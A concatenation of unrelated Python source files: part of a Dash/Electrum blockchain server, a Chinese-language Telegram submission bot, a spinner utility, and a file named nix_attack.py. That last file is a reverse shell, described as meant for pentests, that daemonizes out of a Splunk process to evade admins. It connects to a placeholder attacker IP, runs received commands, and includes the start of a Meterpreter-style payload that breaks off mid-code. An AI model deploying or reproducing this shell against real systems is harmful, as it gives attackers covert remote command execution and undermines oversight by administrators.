self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.dashd('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException, e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Bitcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.dashd('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.dashd('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.dashd('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.dashd_url, postdata)
r = load(response)
response.close()
except:
logger.error("dashd error (getfullblock)")
self.wait_on_dashd()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run dashd with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_dashd()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.dashd('getinfo')
self.relayfee = info.get('relayfee')
self.dashd_height = info.get('blocks')
dashd_block_hash = self.dashd('getblockhash', (self.dashd_height,))
if self.storage.last_hash == dashd_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.dashd('getblockhash', (self.storage.height + 1,))
except BaseException, e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.dashd('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.dashd('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
main.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import json
import telegram.ext
import telegram
import sys
import datetime
import os
import logging
import threading
import six
if six.PY2:
reload(sys)
sys.setdefaultencoding('utf8')
Version_Code = 'v1.0.0'
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
PATH = os.path.dirname(os.path.realpath(__file__)) + '/'
CONFIG = json.loads(open(PATH + 'config.json', 'r').read())
DATA_LOCK = False
submission_list = json.loads(open(PATH + 'data.json', 'r').read())
def save_data():
global DATA_LOCK
while DATA_LOCK:
time.sleep(0.05)
DATA_LOCK = True
f = open(PATH + 'data.json', 'w')
f.write(json.dumps(submission_list, ensure_ascii=False))
f.close()
DATA_LOCK = False
def save_config():
f = open(PATH + 'config.json', 'w')
f.write(json.dumps(CONFIG, indent=4))
f.close()
updater = telegram.ext.Updater(token=CONFIG['Token'])
dispatcher = updater.dispatcher
me = updater.bot.get_me()
CONFIG['ID'] = me.id
CONFIG['Username'] = '@' + me.username
print('Starting... (ID: ' + str(CONFIG['ID']) + ', Username: ' + CONFIG['Username'] + ')')
def process_msg(bot, update):
if update.channel_post != None:
return
print('update_from_user_id', update.message.from_user.id)
print('update_chat_id', update.message.chat_id)
print('config_group_id', CONFIG['Group_ID'])
if update.message.chat_id == CONFIG['Group_ID'] \
and update.message.reply_to_message != None:
if update.message.reply_to_message.from_user.id == CONFIG['ID'] \
and (update.message.reply_to_message.forward_from != None
or update.message.reply_to_message.forward_from_chat
!= None):
msg = update.message.reply_to_message
global submission_list
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] == True:
return
if submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['type'] == 'real':
post = real_name_post(bot, msg,
update.message.from_user)
elif submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['type'] \
== 'anonymous':
post = anonymous_post(bot, msg,
update.message.from_user)
if update.message.text != None:
bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=update.message.text,
reply_to_message_id=post.message_id)
return
if update.message.from_user.id == update.message.chat_id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real'),
telegram.InlineKeyboardButton("否",
callback_data='submission_type:anonymous')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
if update.message.forward_from != None \
or update.message.forward_from_chat != None:
if update.message.forward_from_chat != None:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
elif update.message.forward_from.id \
!= update.message.from_user.id:
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("是"
, callback_data='submission_type:real')],
[telegram.InlineKeyboardButton("取消投稿",
callback_data='cancel:submission')]])
bot.send_message(chat_id=update.message.chat_id,
text="即将完成投稿...\n您是否想要保留消息来源(保留消息发送者用户名,若要申请解封ID,请选择保留用户名)",
reply_to_message_id=update.message.message_id,
reply_markup=markup)
def process_command(bot, update):
if update.channel_post != None:
return
command = update.message.text[1:].replace(CONFIG['Username'], ''
).lower()
if command == 'start':
bot.send_message(chat_id=update.message.chat_id,
text="""可接收的投稿类型:
文字
图片
音频/语音
视频
文件""")
return
if command == 'version':
bot.send_message(chat_id=update.message.chat_id,
text='Telegram Submission Bot\n'
+ Version_Code
+ '\nhttps://github.com/Netrvin/telegram-submission-bot'
)
return
if update.message.from_user.id == CONFIG['Admin']:
if command == 'setgroup':
CONFIG['Group_ID'] = update.message.chat_id
save_config()
bot.send_message(chat_id=update.message.chat_id,
text="已设置本群为审稿群")
return
def anonymous_post(bot, msg, editor):
if msg.audio != None:
r = bot.send_audio(chat_id=CONFIG['Publish_Channel_ID'],
audio=msg.audio, caption=msg.caption)
elif msg.document != None:
r = bot.send_document(chat_id=CONFIG['Publish_Channel_ID'],
document=msg.document,
caption=msg.caption)
elif msg.voice != None:
r = bot.send_voice(chat_id=CONFIG['Publish_Channel_ID'],
voice=msg.voice, caption=msg.caption)
elif msg.video != None:
r = bot.send_video(chat_id=CONFIG['Publish_Channel_ID'],
video=msg.video, caption=msg.caption)
elif msg.photo:
r = bot.send_photo(chat_id=CONFIG['Publish_Channel_ID'],
photo=msg.photo[0], caption=msg.caption)
else:
r = bot.send_message(chat_id=CONFIG['Publish_Channel_ID'],
text=msg.text_markdown,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def real_name_post(bot, msg, editor):
global submission_list
r = bot.forward_message(chat_id=CONFIG['Publish_Channel_ID'],
from_chat_id=CONFIG['Group_ID'],
message_id=msg.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(msg.message_id)]['posted'] = True
bot.edit_message_text(text="新投稿\n投稿人: ["
+ submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_Name']
+ '](tg://user?id='
+ str(submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'])
+ """)
来源: 保留
审稿人: [""" + editor.name
+ '](tg://user?id=' + str(editor.id)
+ ")\n已采用", chat_id=CONFIG['Group_ID'],
parse_mode=telegram.ParseMode.MARKDOWN,
message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Markup_ID'])
bot.send_message(chat_id=submission_list[str(CONFIG['Group_ID'])
+ ':' + str(msg.message_id)]['Sender_ID'],
text="您的稿件已过审,感谢您对我们的支持",
reply_to_message_id=submission_list[str(CONFIG['Group_ID'
]) + ':' + str(msg.message_id)]['Original_MsgID'])
threading.Thread(target=save_data).start()
return r
def process_callback(bot, update):
if update.channel_post != None:
return
global submission_list
query = update.callback_query
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:real':
real_name_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.message.chat_id == CONFIG['Group_ID'] and query.data \
== 'receive:anonymous':
anonymous_post(bot, query.message.reply_to_message,
query.from_user)
return
if query.data == 'cancel:submission':
bot.edit_message_text(text="已取消投稿",
chat_id=query.message.chat_id,
message_id=query.message.message_id)
return
msg = "新投稿\n投稿人: [" + query.message.reply_to_message.from_user.name \
+ '](tg://user?id=' \
+ str(query.message.reply_to_message.from_user.id) + ")\n来源: "
fwd_msg = bot.forward_message(chat_id=CONFIG['Group_ID'],
from_chat_id=query.message.chat_id,
message_id=query.message.reply_to_message.message_id)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)] = {}
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['posted'] = False
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_Name'] = \
query.message.reply_to_message.from_user.name
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Sender_ID'] = \
query.message.reply_to_message.from_user.id
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Original_MsgID'] = \
query.message.reply_to_message.message_id
if query.data == 'submission_type:real':
msg += "保留"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'real'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:real')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
elif query.data == 'submission_type:anonymous':
msg += "匿名"
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['type'] = 'anonymous'
markup = \
telegram.InlineKeyboardMarkup([[telegram.InlineKeyboardButton("采用"
, callback_data='receive:anonymous')]])
markup_msg = bot.send_message(chat_id=CONFIG['Group_ID'],
text=msg, reply_to_message_id=fwd_msg.message_id,
reply_markup=markup,
parse_mode=telegram.ParseMode.MARKDOWN)
submission_list[str(CONFIG['Group_ID']) + ':'
+ str(fwd_msg.message_id)]['Markup_ID'] = \
markup_msg.message_id
bot.edit_message_text(text="感谢您的投稿", chat_id=query.message.chat_id,
message_id=query.message.message_id)
threading.Thread(target=save_data).start()
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.text
| telegram.ext.Filters.audio
| telegram.ext.Filters.photo
| telegram.ext.Filters.video
| telegram.ext.Filters.voice
| telegram.ext.Filters.document, process_msg))
dispatcher.add_handler(telegram.ext.MessageHandler(telegram.ext.Filters.command,
process_command))
dispatcher.add_handler(telegram.ext.CallbackQueryHandler(process_callback))
updater.start_polling()
print('Started')
updater.idle()
print('Stopping...')
save_data()
print('Data saved.')
print('Stopped.')
|
spinner.py
|
# Copyright (c) 2018, Vanessa Sochat All rights reserved.
# See the LICENSE in the main repository at:
# https://www.github.com/openschemas/openschemas-python
import os
import sys
import sys
import time
import threading
from random import choice
class Spinner:
spinning = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
@staticmethod
def balloons_cursor():
while 1:
for cursor in '. o O @ *': yield cursor
@staticmethod
def changing_arrows():
while 1:
for cursor in '<^>v': yield cursor
def select_generator(self, generator):
if generator == None:
generator = choice(['cursor',
'arrow',
'balloons'])
return generator
def __init__(self, delay=None, generator=None):
generator = self.select_generator(generator)
if generator == 'cursor':
self.spinner_generator = self.spinning_cursor()
elif generator == 'arrow':
self.spinner_generator = self.changing_arrows()
elif generator == 'balloons':
self.spinner_generator = self.balloons_cursor()
if delay is None: delay = 0.2
else:
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def run(self):
while self.spinning:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.spinning = True
threading.Thread(target=self.run).start()
def stop(self):
self.spinning = False
time.sleep(self.delay)
|
nix_attack.py
|
#!/usr/bin/env python
#**************************************************************************#
# Filename: py_rev_shel.py (Created: 2016-08-18) #
# (Updated: 2016-10-02) #
# Info: #
# TBG Security Python Reverse Shell for pentests. #
# This will fork itself and detach from the parent Splunk process #
# so that Splunk does not hang while the reverse shell is running. #
# This also helps to avoid detection by Splunk admins. #
# Author: #
# Ryan Hays #
#**************************************************************************#
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
# Update
shell_type = "msf"
ipaddy = "<IP ADDRESS HERE>"
port = 4443
UMASK = 0
WORKDIR = "/"
MAXFD = 1024
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
def createdaemon():
try:
pid = os.fork()
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The first child.
os.setsid()
try:
pid = os.fork() # Fork a second child.
except OSError, e:
raise Exception, "%s [%d]" % (e.strerror, e.errno)
if pid == 0: # The second child.
os.chdir(WORKDIR)
os.umask(UMASK)
else:
os._exit(0) # Exit parent (the first child) of the second child.
else:
os._exit(0) # Exit parent of the first child.
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
return 0
if __name__ == "__main__":
retCode = createdaemon()
procParams = """
return code = %s
process ID = %s
parent process ID = %s
process group ID = %s
session ID = %s
user ID = %s
effective user ID = %s
real group ID = %s
effective group ID = %s
""" % (retCode, os.getpid(), os.getppid(), os.getpgrp(), os.getsid(0),
os.getuid(), os.geteuid(), os.getgid(), os.getegid())
if shell_type.lower() == 'std':
so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
so.connect((ipaddy, port))
except socket.error:
sys.exit(retCode)
tI = False
while not tI:
data = so.recv(1024)
if len(data) == 0:
tI = True
stdin, stdout, stderr, = os.popen3(data)
stdout_value = stdout.read() + stderr.read()
so.send(stdout_value)
elif shell_type.lower() == 'msf':
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
# reseed the random generator.
random.seed()
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = '606221c9f94dc57ccb90de849c6142d6'
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = (0)
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1 << 31) + (1 << 30) + (1 << 29) + (1 << 19) + (1 << 18) + (1 << 17) + (1 << 16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def rand_byte():
return chr(random.randint(1, 255))
def rand_xor_key():
return ''.join(rand_byte() for _ in range(4))
def xor_bytes(key, data):
return ''.join(chr(ord(data[i]) ^ ord(key[i % len(key)])) for i in range(len(data)))
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
error_number = ctypes.windll.kernel32.GetLastError()
if error_number > 0xffff:
return ERROR_FAILURE
result = ((error_number << 16) | ERROR_FAILURE_WINDOWS)
return result
@export
